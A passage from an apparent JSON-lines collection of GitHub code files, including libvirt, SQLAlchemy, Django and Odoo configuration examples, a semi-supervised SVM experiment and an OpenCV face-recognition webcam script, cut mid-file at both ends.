chunk and load it into the vector store.\nraw_documents = OnlinePDFLoader('llm/chatdev.pdf').load()\ntext_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\ndocuments = text_splitter.split_documents(raw_documents)\ndb = Chroma.from_documents(documents, HuggingFaceEmbeddings(model_name=\"all-MiniLM-L6-v2\"))\n\nquery = \"What is the average cost in software production\"\ndocs = db.similarity_search(query)\nprint(docs[0].page_content)","repo_name":"anyangp/llm","sub_path":"rag/retrieval_augmented_generation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"37669494429","text":"'''\n\nExample 11. Using getCellsFreeMemory\n\nThis example demonstrates the getCellsFreeMemory() method.\nIt can be used to obtain the amount of free memory in bytes\nin some or all of the NUMA nodes in the system.\n\n'''\n\nimport sys\nimport libvirt\n\nuri = 'qemu:///system'\nconn = libvirt.open(uri)\nif conn is None:\n print(f\"Failed to open connection to {uri}\", file=sys.stderr)\n exit(1)\n\nnodeinfo = conn.getInfo()\nnumnodes = nodeinfo[4]\n\nmemlist = conn.getCellsFreeMemory(0, numnodes)\ncell = 0\nfor cellfreemem in memlist:\n print(f'Node {cell}: {cellfreemem} bytes free')\n cell += 1\n\nconn.close()\nexit(0)\n","repo_name":"almacro/snippets","sub_path":"python/libvirt/basic/using_getCellsFreeMemory.py","file_name":"using_getCellsFreeMemory.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15204411419","text":"from backend.config import MarineConfig\nfrom backend.app.cma.crud import MarineMonitorCRUD\nfrom backend.utils.notification import Email\n\n\nclass MonitorService(MarineConfig):\n \"\"\"\n 监控的一些逻辑处理相关的方法\n \"\"\"\n\n def __init__(self):\n super(MonitorService, self).__init__()\n\n def send_monitor_info_email(self, monitor_info_item):\n \"\"\"\n 发送监控邮件\n :param monitor_info_item:\n :return:\n \"\"\"\n monitor_crud = MarineMonitorCRUD()\n resp = monitor_crud.get_monitor_info_by_item(\n monitor_time=monitor_info_item.monitor_time,\n monitor_type=monitor_info_item.monitor_type,\n )\n if resp:\n print(\"监控邮件发送过\")\n return False\n else:\n print(\"监控邮件未发送\")\n email = Email(\n mail_from=self.config[\"mail_from\"],\n mail_to=self.config[\"mail_to\"],\n mail_key=self.config[\"mail_key\"],\n )\n subject = f\"{monitor_info_item.monitor_time} 舱位情况通知\"\n content = (\n f\"监控到有如下航线情况可以下单,情根据实际情况操作:\\n\"\n f\"
类型:{monitor_info_item.monitor_type}\n\"\n            f\"装货港:{monitor_info_item.port_of_loading}\n\"\n            f\"卸货港:{monitor_info_item.port_of_discharge}\n\"\n            f\"线路详情:{monitor_info_item.container_detail}\n
\"\n )\n\n return email.send(subject, content)\n","repo_name":"binbinah/marineConsole","sub_path":"backend/app/cma/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"26454499829","text":"presettest = {\n # ---------------- marker ----------------\n# \"\"\"\n# some nice description of the project\n# \"\"\"\n \"presettest\": {\n 'site_name': 'presettest',\n 'servername': 'presettest',\n 'erp_admin_pw': '',\n 'erp_version': '10.0',\n # servertype is odoo or flectra\n 'erp_provider': 'odoo',\n 'db_name': 'presettest',\n # inherits tells from what other site we want to inherit values\n 'inherit': '',\n # should we use demodata\n 'without_demo': 'all',\n # pg_version to use with dumper\n # 'pg_version' : '--cluster 10/main',\n 'site_settings': {\n # proto is either http:// or https://\n # it is used to construct the web.base.url\n # if not set, the base url will be left untouched\n 'proto': 'http://',\n 'configs': {\n 'website_config': {\n 'model': \"website.config.settings\",\n 'website_name': 'Your Sitenmae',\n # needs recaptcha installed\n # 'site_key' : 'xx',\n # 'secret_key' : 'x',\n },\n # the following sample values assume, that the module support branding is installed\n 'support_branding': {\n 'model': 'ir.config_parameter',\n 'config_parameter_company_name': 'Your company',\n 'config_parameter_company_url': 'https://yourwebsite.com',\n 'config_parameter_company_color': '#000',\n 'config_parameter_support_email': 'support@yourwebsite.com',\n 'config_parameter_release': 42,\n },\n },\n 'server_config': {\n # override values to be set in the server config file\n # the defaul values that can be manipulated from this stanza are set\n # in templates/openerp_cfg_defaults.py\n # 'workers' : 4,\n },\n 'site_settings': {\n # data to bes set on the remote server with\n # --set-site-data\n 'company_data': {\n # use any number of fields you want to set on the main company\n # this is normaly done after after all modules are installed\n # so you can also use fields like firstname/lastname that are\n # only available after the addons have been installed\n 'name': 'acme & co',\n 'street': 'the street 007',\n 'zip': '12345',\n 'city': 'The City',\n 'phone': 'the phone number',\n },\n 'users': {\n # add users you want to be created\n # for each user provide either an string with the email,\n # or a dictionary with more data. 
In any case, the email must\n # be provided\n # the same rules as for the company apply\n 'testuser': 'test_user@presettest.ch',\n 'otheruser': {\n 'email': 'otheruserpresettest.ch',\n 'city': 'otherusers city',\n # ...\n },\n },\n # what languaes to load, the first one will be the default language\n # unless the language is an empty string\n 'languages': [], # ['de_CH', 'fr_CH']\n },\n 'local_settings': {\n # these are values that are set, when we run bin/c with the\n # -SL --set-local-data option\n # candiates to set are:\n # admin emai (pw is allready set to 'admin')\n # base url ..\n 'base_url': 'http://localhost:8069',\n 'admin_mail': 'robert@redo2oo.ch',\n 'addons': {\n 'install': [],\n # unistall is not yet implemented\n 'uninstall': []\n },\n 'site_settings': {\n 'configs': {\n 'ir.config_parameter': {\n 'records': [\n # list of (search-key-name, value), {'field' : value, 'field' : value ..}\n [('key', 'support_branding.company_name'),\n {'value': 'redO2oo KLG'}],\n ],\n },\n },\n },\n },\n },\n 'email_settings': {\n 'smtp_server': '',\n 'email_server_incomming': '',\n 'email_user_incomming': '',\n 'email_pw_incomming': '',\n 'email_userver_outgoing': '',\n 'email_user_outgoing': '',\n 'email_pw_outgoing': '',\n },\n 'remote_server': {\n 'remote_url': 'localhost', # please adapt\n 'remote_data_path': '/root/erp_workbench',\n 'remote_user': 'root',\n # where is sites home on the remote server for non root users\n 'remote_sites_home': '/home/robert/erp_workbench',\n 'redirect_emil_to': '', # redirect all outgoing mail to this account\n # needs red_override_email_recipients installed\n },\n 'docker': {\n 'base_image': 'robertredcor/presettest:10.0-latest',\n 'odoo_image_version': 'odoo:10.0',\n 'container_name': 'presettest',\n # 'db_container_name' : 'db', # needs only to be set if it is not 'db'\n # trough what port can we access oddo (mapped to 8069)\n 'odoo_port': '??',\n # trough what port can we access odoos long polling port (mapped to 8072)\n 'odoo_longpoll': '??',\n # within the the container the user odoo has a user and group id that\n # is used to access the files in the log and filestore volumes\n 'external_user_group_id': '104:107',\n # hub_name is the name to use to store our own images\n 'hub_name': 'docker_hub',\n # ODOO_BASE_URL\n # If this variable is set, the `ir.config_parameter` `web.base.url`\n # will be automatically set to this domain when the container\n # starts. 
`web.base.url.freeze` will be set to `True`.\n 'ODOO_BASE_URL': 'https://www.presettest.ch'\n },\n # docker_hub is used to store images we build ourself\n # by default we use dockers own docker_hub, but could\n # provide our own\n 'docker_hub': {\n # 'docker_hub' : {\n # 'user' : 'robertredcor',\n # 'docker_hub_pw' : '',\n # }\n },\n 'apache': {\n 'vservername': 'www.presettest.ch',\n # 'vserveraliases': ['presettest.ch',],\n },\n # path to the letsencrypt structure\n 'letsencrypt': {\n 'path': '/etc/letsencrypt/live/'\n },\n # odoo_addons allow to install odoo base tools\n 'odoo_addons': [\n 'account', # Invoicing\n 'account_accountant', # Accounting and Finance\n 'crm',\n 'l10n_ch', # Switzerland - Accounting\n 'mail', # Discuss\n 'website',\n ],\n 'addons': [\n {\n 'type' : 'git',\n 'url' : 'https://github.com/OCA/l10n-switzerland.git',\n 'branch' : '10.0',\n 'group' : 'l10n-switzerland_oca',\n 'add_path' : 'l10n-switzerland_oca',\n 'names' : [\n 'l10n_ch_states',\n 'l10n_ch_bank',\n 'l10n_ch_base_bank',\n 'l10n_ch_payment_slip']\n },\n {\n 'type' : 'git',\n 'url' : 'https://github.com/OCA/bank-payment.git',\n 'branch' : '10.0',\n 'group' : 'bank_payment',\n 'add_path' : 'bank_payment',\n 'names' : ['account_payment_partner'],\n },\n {\n 'type' : 'git',\n 'url' : 'https://github.com/OCA/bank-statement-reconcile.git',\n 'branch' : '10.0',\n 'group' : 'bank_statement_reconcile',\n 'add_path' : 'bank_statement_reconcile',\n 'names' : ['base_transaction_id'],\n },\n ],\n 'tags': {\n # ***********************************\n # a dictonary pointing to tags to be\n # used for addons.\n # tags found here have lower precendence\n # the the ones found in the addon section\n # ***********************************\n # 'module_x' : 'vXXX',\n },\n 'skip': {\n # the addons to skip when installing\n # the name is looked up in the addon stanza in the following sequence:\n # - name\n # - add_path\n # - group\n 'addons': [],\n # skip when it is installed\n 'updates': [],\n },\n # extra libraries needed to be installed by pip or apt\n # this is used in two places\n # 1. pip installs are executed when creating a site on the local computer\n # and executing bin/dosetup [-f] in the sites buildout directory\n # 2. 
both pip and apt installs are executed when a docker image is created\n 'extra_libs': {\n # 'pip' : [\n # 'xmlsec',\n # 'scrapy',\n # 'html2text',\n # ],\n # 'apt' : [\n # 'python-dev',\n # 'pkg-config',\n # 'libxml2-dev',\n # 'libxslt1-dev',\n # 'libxmlsec1-dev',\n # 'libffi-dev',\n # ]\n },\n 'develop': {\n 'addons': [],\n },\n # slave info: is this site slave of a master site from which it will be updated\n 'slave_info': {\n # # master_site ist the name of the mastersite\n # # this must be a site in sites.py\n # \"master_site\" : '',\n # # master_domain is the domain from which the master is copied\n # \"master_domain\" : 'localhost',\n }\n },\n\n}\n","repo_name":"westlyou/erp-workbench","sub_path":"presets/divers/presettest.py","file_name":"presettest.py","file_ext":"py","file_size_in_byte":10379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"29502751275","text":"from sklearn.svm import SVC\r\nimport pandas as pd\r\nimport pickle\r\nimport numpy as np\r\nimport os\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport time\r\nfrom sklearn.metrics import accuracy_score\r\nimport math\r\n\r\n\r\nclass svm_ssl(object):\r\n def __init__(self, split_number_u, system, s_number):\r\n self.split_number_u = self.split_number_l = split_number_u\r\n self.system = system\r\n self.s_number = 10 \r\n\r\n self.test_number = 50\r\n self.flag = True\r\n self.SVM1 = SVC(random_state=0, C=1.0, kernel='rbf', class_weight='balanced', probability=True)\r\n self.SVM2 = SVC(random_state=0, C=1.0, kernel='rbf', class_weight='balanced', probability=True)\r\n # self.model_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n # '{}/svm_ssl_model.pickle'.format(system))\r\n # self.scalar_model_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n # '{}/svm_ssl_scalar.pickle'.format(system))\r\n\r\n self.test_data_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n '{}/{}_test_data.csv'.format(system, system))\r\n self.data_L_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n '{}/{}/{}_{}_data_L.csv'.format(system, s_number, system, self.split_number_u))\r\n\r\n self.data_U_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n '{}/{}/{}_{}_data_U.csv'.format(system, s_number, system, self.split_number_u))\r\n\r\n def data_in(self, data):\r\n columns = list(data.columns)\r\n data = data.drop('label', 1)\r\n # print(data)\r\n return data\r\n\r\n def fit_svm1(self, data, model):\r\n Y = data.iloc[:, -1].values.astype(int)\r\n if len(np.unique(Y)) == 1:\r\n data = pd.concat((data, data.iloc[-1:, :]), axis=0)\r\n Y = data.iloc[:, -1].values.astype(int)\r\n Y[-1] = abs(Y[-1] - 1)\r\n X = self.data_in(data)\r\n X = X.values\r\n scalar = StandardScaler()\r\n X = scalar.fit_transform(X)\r\n model = model.fit(X, Y)\r\n return model, scalar\r\n\r\n def fit_svm2(self, data, model):\r\n Y = data.iloc[:, -1].values.astype(int)\r\n if len(np.unique(Y)) == 1:\r\n data = pd.concat((data, data.iloc[-1:, :]), axis=0)\r\n Y = data.iloc[:, -1].values.astype(int)\r\n Y[-1] = abs(Y[-1] - 1)\r\n\r\n X = self.data_in(data)\r\n X = X.values\r\n scalar = StandardScaler()\r\n X = scalar.fit_transform(X)\r\n model = model.fit(X, Y)\r\n return model, scalar\r\n\r\n def one_train(self, svm1, svm2, data_L, data_U, data_S):\r\n # permutation = np.random.permutation(len(data_L))\r\n\r\n data_L1 = data_L.iloc[:int(len(data_L) / 2), :]\r\n data_L2 = 
data_L.iloc[int(len(data_L) / 2):, :]\r\n svm1_train_data = pd.concat((data_L1, data_S), axis=0)\r\n svm1_train_data = svm1_train_data.reset_index(drop=True)\r\n\r\n svm1, scalar1 = self.fit_svm1(svm1_train_data, svm1)\r\n svm2, scalar2 = self.fit_svm2(data_L2, svm2)\r\n\r\n U_and_S_data = pd.concat((data_U, data_S), axis=0)\r\n U_and_S_data = U_and_S_data.reset_index(drop=True)\r\n\r\n test_data_process = self.data_in(U_and_S_data)\r\n test_data_process1 = scalar1.transform(test_data_process)\r\n test_data_process2 = scalar2.transform(test_data_process)\r\n\r\n predict1 = svm1.predict(test_data_process1)\r\n predict2 = svm2.predict(test_data_process2)\r\n probility2 = svm1.predict_proba(test_data_process1)\r\n probility2 = np.array([max(i) for i in probility2])\r\n\r\n index_new_S = []\r\n i = 0\r\n for x, y in zip(list(predict1), list(predict2)):\r\n if x == y:\r\n index_new_S.append(i)\r\n i += 1\r\n\r\n data_S = U_and_S_data.iloc[index_new_S, :] \r\n probility2 = probility2[index_new_S]\r\n\r\n # print(data_S)\r\n predict_values = predict1[index_new_S]\r\n true_value = list(data_S.iloc[:, -1])\r\n\r\n data_S = data_S.iloc[:, :-1]\r\n data_S['label'] = np.array(predict_values)\r\n\r\n data_S = data_S.reset_index(drop=True)\r\n if len(data_S) > self.s_number and self.flag:\r\n # index = np.argpartition(probility2, len(probility2) - self.s_number)\r\n # index = index[-self.s_number:]\r\n # list_choose_s = index\r\n index = np.argsort(probility2)\r\n list_choose_s = index[-self.s_number:]\r\n else:\r\n list_choose_s = range(len(data_S))\r\n\r\n data_S = data_S.iloc[list_choose_s, :]\r\n data_S = data_S.reset_index(drop=True)\r\n\r\n dengyu = sum(predict_values[list_choose_s] == np.array(true_value)[list_choose_s])\r\n index_new_S = [index_new_S[i] for i in list_choose_s] \r\n data_U = U_and_S_data.drop(index=index_new_S) \r\n data_U = data_U.reset_index(drop=True)\r\n data_L = data_L.reset_index(drop=True)\r\n\r\n return svm1, svm2, data_L, data_U, data_S, scalar1\r\n\r\n def train(self):\r\n data_L = pd.read_csv(self.data_L_path)\r\n # data_L = data_L.sample(frac=split_number).reset_index(drop=True)\r\n data_U = pd.read_csv(self.data_U_path)\r\n # data_U = data_U.sample(frac=split_number).reset_index(drop=True)\r\n\r\n final_data_l = data_L.iloc[:, :]\r\n\r\n test_data = pd.read_csv(self.test_data_path)\r\n\r\n data_S = pd.DataFrame(columns=data_L.columns)\r\n epoch = 0\r\n\r\n while (not data_U.empty) and epoch < 10:\r\n self.SVM1, self.SVM2, data_L, data_U, data_S, scalar1 = self.one_train(self.SVM1, self.SVM2, data_L, data_U,\r\n data_S)\r\n epoch += 1\r\n self.test(self.SVM1, test_data, scalar1)\r\n\r\n svm1_train_data = pd.concat((data_L, data_S), axis=0)\r\n svm1_train_data = svm1_train_data.reset_index(drop=True)\r\n\r\n svm1, scalar = self.fit_svm1(svm1_train_data, self.SVM1)\r\n\r\n accuracy, rank_avg, rd_loss_max, rd_loss_min = self.test(svm1, test_data, scalar)\r\n # return svm1, test_data, scalar\r\n return accuracy, rank_avg, rd_loss_max, rd_loss_min\r\n\r\n def rank_test(self, predict, true_y, test_number):\r\n predict_rank = {}\r\n true_rank = {}\r\n for i in range(test_number):\r\n predict_rank[i] = [0, 0]\r\n true_rank[i] = [0, 0]\r\n\r\n number_index = 0\r\n for i in range(test_number):\r\n for j in range(i + 1, test_number):\r\n if predict[number_index] == 1:\r\n predict_rank[i][1] += 1\r\n predict_rank[j][0] += 1\r\n else:\r\n predict_rank[i][0] += 1\r\n predict_rank[j][1] += 1\r\n\r\n if true_y[number_index] == 1:\r\n true_rank[i][1] += 1\r\n true_rank[j][0] += 1\r\n 
else:\r\n true_rank[i][0] += 1\r\n true_rank[j][1] += 1\r\n number_index += 1\r\n\r\n rank_avg = 0\r\n rd_loss_max = 0\r\n rd_loss_min = 0\r\n\r\n for i in range(len(predict_rank)):\r\n rank_avg += abs(predict_rank[i][0] - true_rank[i][0])\r\n rank_avg = rank_avg / len(predict_rank)\r\n\r\n for i in range(len(predict_rank)):\r\n if true_rank[i][1] == 0:\r\n rd_loss_max = abs(predict_rank[i][0] - true_rank[i][0])\r\n break\r\n\r\n for i in range(len(predict_rank)):\r\n if true_rank[i][0] == 0:\r\n rd_loss_min = abs(predict_rank[i][0] - true_rank[i][0])\r\n break\r\n\r\n return rank_avg, rd_loss_max, rd_loss_min\r\n\r\n def test(self, model, testdata, scalar):\r\n y = testdata.iloc[:, -1].values.astype(int)\r\n\r\n testdataset = self.data_in(testdata)\r\n testdataset = testdataset.reset_index(drop=True)\r\n\r\n X = scalar.transform(testdataset.values)\r\n y_pred = model.predict(X)\r\n rank_avg, rd_loss_max, rd_loss_min = self.rank_test(y_pred, y, self.test_number)\r\n return accuracy_score(y, y_pred), rank_avg, rd_loss_max, rd_loss_min\r\n\r\n\r\ndef system_samplesize(sys_name):\r\n\r\n N_train_all = np.multiply(6, [1, 2, 3])\r\n\r\n return N_train_all\r\n\r\n\r\ndef out_dict_info():\r\n systerm_list = ['hadoopsort', 'hadoopterasort', 'hadoopwordcount', 'mysql',\r\n 'redis', 'sparksort', 'sparkterasort', 'sparkwordcount', 'sqlite', 'tomcat', 'x264']\r\n\r\n s_number_list = [2, 3, 4]\r\n\r\n class multidict(dict):\r\n def __getitem__(self, item):\r\n try:\r\n return dict.__getitem__(self, item)\r\n except KeyError:\r\n value = self[item] = type(self)()\r\n return value\r\n\r\n dict_info = multidict()\r\n\r\n for s_number in s_number_list:\r\n for system in systerm_list:\r\n number_list = system_samplesize(system)\r\n for number in number_list:\r\n\r\n if number % s_number != 0:\r\n half = math.floor(number / s_number)\r\n Q_number = (number - math.floor(number / s_number)) * 20\r\n else:\r\n half = number / s_number\r\n Q_number = math.ceil(number / s_number) * (s_number - 1) * 20\r\n\r\n N = (half * (half - 1) // 2) + Q_number\r\n first = math.ceil(math.sqrt(N * 2))\r\n if first > number:\r\n add_ = number - half\r\n sub_ = (number) * (number - 1) // 2\r\n else:\r\n if first * (first - 1) // 2 < N:\r\n first += 1\r\n\r\n add_ = first - half\r\n if first * (first - 1) // 2 == N:\r\n sub_ = first * (first - 1) // 2\r\n else:\r\n sub_ = first * (first - 1) // 2 - N\r\n sub_ = - sub_\r\n elif first * (first - 1) // 2 == N:\r\n add_ = first - half\r\n sub_ = first * (first - 1) // 2\r\n else:\r\n add_ = first - half\r\n if first * (first - 1) // 2 == N:\r\n sub_ = first * (first - 1) // 2\r\n else:\r\n sub_ = first * (first - 1) // 2 - N\r\n sub_ = - sub_\r\n dict_info[s_number][system][Q_number][number] = [sub_, add_]\r\n return dict_info\r\n\r\nif __name__ == '__main__':\r\n\r\n dict_data = out_dict_info()\r\n systerm_list = ['hadoopsort', 'hadoopterasort', 'hadoopwordcount', 'sparksort', 'sparkterasort', 'sparkwordcount',\r\n 'mysql', 'redis',\r\n 'x264', 'tomcat', 'sqlite']\r\n s_number_list = [2, 3, 4]\r\n\r\n columns = ['Systerm', 'Split_NUMBER', 'NUMBER', 'accuracy', 'rank_avg',\r\n 'rd_loss_max', 'rd_loss_min']\r\n out = pd.DataFrame(columns=columns)\r\n out.to_csv('svm_ssl.csv', index=False)\r\n\r\n for system in systerm_list:\r\n for s_number in s_number_list:\r\n number_list = system_samplesize(system)\r\n for number in number_list:\r\n if number==6:\r\n continue\r\n print(\"---{}---{}----{}-\".format(system, s_number, number))\r\n accuracy, rank_avg, rd_loss_max, rd_loss_min = 
svm_ssl(number, system, s_number).train()\r\n row = [\r\n [system, s_number, number, accuracy, rank_avg, rd_loss_max,\r\n rd_loss_min]]\r\n out = pd.DataFrame(row)\r\n out.to_csv('svm_ssl.csv', index=False, mode='a+', header=None)\r\n print(\"----------------------\")\r\n","repo_name":"xdbdilab/CM-CASL","sub_path":"code/SSL.py","file_name":"SSL.py","file_ext":"py","file_size_in_byte":12014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"37144035210","text":"from decimal import Decimal\r\nfrom django.db import models\r\nfrom django.core.validators import MaxValueValidator, MinValueValidator\r\nfrom phonenumber_field.modelfields import PhoneNumberField\r\n\r\n\r\nclass receipt_status(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n\r\n class Meta:\r\n verbose_name = 'Статус заказа'\r\n verbose_name_plural = 'Статусы заказов'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass delivery_type(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n\r\n class Meta:\r\n verbose_name = 'Тип доставки'\r\n verbose_name_plural = 'Типы доставок'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass role(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n description = models.CharField('Описание', max_length=500, blank=True, null=True)\r\n\r\n class Meta:\r\n verbose_name = 'Роль'\r\n verbose_name_plural = 'Роли'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass user(models.Model):\r\n login = models.CharField('Логин', max_length=20, unique=True)\r\n password = models.CharField('Пароль', max_length=20)\r\n name = models.CharField('Имя', max_length=20)\r\n phone = PhoneNumberField('Телефон', unique=True)\r\n address = models.CharField('Адрес', max_length=50)\r\n role_id = models.ForeignKey(role, on_delete=models.PROTECT, verbose_name='Роль')\r\n\r\n class Meta:\r\n verbose_name = 'Пользоваатель'\r\n verbose_name_plural = 'Пользоваатели'\r\n\r\n def __str__(self):\r\n return self.login\r\n\r\n\r\nclass receipt(models.Model):\r\n contact = PhoneNumberField('Телефон')\r\n address = models.CharField('Адрес', max_length=50, default='ул. 
XXXXXXXXXXXX, XX.')\r\n sum_cost = models.DecimalField('Сумма заказа', max_digits=20, decimal_places=2,\r\n validators=[MinValueValidator(Decimal('0.01'))])\r\n status_id = models.ForeignKey(receipt_status, on_delete=models.PROTECT, verbose_name='Статус')\r\n delivery_id = models.ForeignKey(delivery_type, on_delete=models.PROTECT, verbose_name='Тип доставки')\r\n user_id = models.ForeignKey(user, on_delete=models.SET_NULL, verbose_name='Пользователь', null=True, blank=True)\r\n\r\n class Meta:\r\n verbose_name = 'Заказ'\r\n verbose_name_plural = 'Заказы'\r\n\r\n def __str__(self):\r\n return self.address\r\n\r\n\r\nclass product_type(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n\r\n class Meta:\r\n verbose_name = 'Тип товара'\r\n verbose_name_plural = 'Типы товаров'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass product(models.Model):\r\n name = models.CharField('Название', max_length=50)\r\n price = models.DecimalField('Цена', max_digits=20, decimal_places=2,\r\n validators=[MinValueValidator(Decimal('0.01'))])\r\n amount = models.PositiveIntegerField('Количество')\r\n animal = models.CharField('Животное', max_length=50)\r\n img = models.ImageField('Изображение', upload_to='static/main/img',\r\n default='static/main/img/standart_foto.png')\r\n product_type_id = models.ForeignKey(product_type, on_delete=models.PROTECT, verbose_name='Тип')\r\n\r\n class Meta:\r\n verbose_name = 'Товар'\r\n verbose_name_plural = 'Товары'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass receipt_has_product(models.Model):\r\n receipt_id = models.ForeignKey(receipt, on_delete=models.CASCADE, verbose_name='Заказ')\r\n product_id = models.ForeignKey(product, on_delete=models.PROTECT, verbose_name='Товар')\r\n price = models.DecimalField('Цена', max_digits=40, decimal_places=2,\r\n validators=[MinValueValidator(Decimal('0.01'))])\r\n amount = models.PositiveIntegerField('Количество', validators=[MinValueValidator(Decimal('1'))])\r\n\r\n class Meta:\r\n unique_together = ('receipt_id', 'product_id')\r\n verbose_name = 'Заказ-продукт'\r\n verbose_name_plural = 'Заказы-продукты'\r\n\r\n # def __str__(self):\r\n # return self.product_id\r\n","repo_name":"vonderbot/Zoolivery","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72266624177","text":"'''\nTutorial link: https://docs.sqlalchemy.org/en/latest/orm/tutorial.html\nSqlalchemy version: 1.2.15\nPython version: 3.7\n'''\n\nfrom sqlalchemy import create_engine, Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\n\nBase = declarative_base()\n\n\nclass UserInfo(Base):\n __tablename__ = 'users_info'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n user_id = Column(Integer, ForeignKey('users.id'))\n user = relationship('User')\n\n def __repr__(self): # optional\n return f'UserInfo {self.name}'\n\n\nclass User(Base):\n __tablename__ = 'users' # if you use base it is obligatory\n\n id = Column(Integer, primary_key=True) # obligatory\n name = Column(String)\n password = Column(String)\n\n def __repr__(self): # optional\n return f'User {self.name}'\n\n\nengine = create_engine('sqlite:///:memory:')\n\nSession = sessionmaker(bind=engine)\nsession = 
Session()\n\nBase.metadata.create_all(engine)\n","repo_name":"leportella/sqlalchemy-basics-post","sub_path":"creating_foreign_keys_from_start_JupyterHub_example.py","file_name":"creating_foreign_keys_from_start_JupyterHub_example.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"57"} +{"seq_id":"20730080301","text":"# Can you find and fix the bug?\n\nfrom random import randint\n\ndef assign_jerseys(team):\n roster = {}\n for player in players:\n roster[player] = randint(1, 99)\n return roster\n\nplayers = ['Twi', 'Dottie', 'Thelma']\njersey_numbers = assign_jerseys(team)\nprint(jersey_numbers)\n","repo_name":"catherinedevlin/just-enough-python","sub_path":"080-d-write-function.py","file_name":"080-d-write-function.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"16244308795","text":"import cv2\nfrom cv2 import VideoCapture, CascadeClassifier, Mat\nimport os\nimport zipfile\nimport numpy as np\nfrom PIL import Image\nfrom os.path import exists\n\nSRC_PATH = os.getcwd()\nASSETS_PATH = os.path.join(SRC_PATH, 'Assets')\n\ndef main() -> None:\n \"\"\"Main function. Executes the face detection on the webcam function.\n \"\"\"\n face_recognizer = train_LBPH_Face_Recognizer()\n face_detector_path = os.path.join(os.getcwd(), \"Assets\", \"haarcascade_frontalface_default.xml\")\n face_detector = cv2.CascadeClassifier(face_detector_path)\n camera = cv2.VideoCapture(0)\n width, height, font = 220, 220, cv2.FONT_HERSHEY_COMPLEX_SMALL\n\n analyze_faces_on_camera(camera, face_detector, face_recognizer, width, height, font)\n\n camera.release()\n cv2.destroyAllWindows()\n\n\ndef train_LBPH_Face_Recognizer() -> None:\n \"\"\"Trains the LBPHFaceRecognizer.\n \"\"\"\n if exists(os.path.join(ASSETS_PATH, \"rodrigo_lbph_classifier.yml\")):\n lbph_classifier = cv2.face.LBPHFaceRecognizer_create()\n lbph_classifier.read(os.path.join(ASSETS_PATH, \"rodrigo_lbph_classifier.yml\"))\n else:\n extract_zip_folder()\n ids, faces = pre_process_images()\n lbph_classifier = cv2.face.LBPHFaceRecognizer_create(radius=4, neighbors=14, grid_x=9, grid_y=9)\n lbph_classifier.train(faces, ids)\n lbph_classifier.write(os.path.join(ASSETS_PATH, \"rodrigo_lbph_classifier.yml\"))\n\n return lbph_classifier\n\n\ndef extract_zip_folder() -> None:\n \"\"\"Extracts the zip folder containing the images to be used in the LBPH classifier.\n \"\"\"\n rodrigo_zip_path = os.path.join(ASSETS_PATH, \"rodrigo.zip\")\n zip = zipfile.ZipFile(file=rodrigo_zip_path, mode = 'r')\n zip.extractall(os.path.join(ASSETS_PATH, \"Data\"))\n zip.close()\n\n\ndef pre_process_images() -> tuple[np.ndarray, np.ndarray]:\n \"\"\"Pre-process images from a folder to be used in the LBPH classifier.\n\n Args:\n images_folder_path (str): Path to the folder containing the images.\n \"\"\"\n image_paths = [os.path.join(ASSETS_PATH, \"Data\", \"rodrigo\", img_path) for img_path in os.listdir(os.path.join(ASSETS_PATH, \"Data\", \"rodrigo\"))]\n faces = []\n ids = []\n for path in image_paths:\n image = Image.open(path).convert('L')\n imagem_np = np.array(image, 'uint8')\n id = 1\n ids.append(id)\n faces.append(imagem_np)\n\n return np.array(ids), np.array(faces)\n\n\ndef analyze_faces_on_camera(camera:VideoCapture, face_detector:CascadeClassifier, face_recognizer, width:int, height:int, font:int) -> None:\n \"\"\"Detects faces on camera and draws a rectangle around them. 
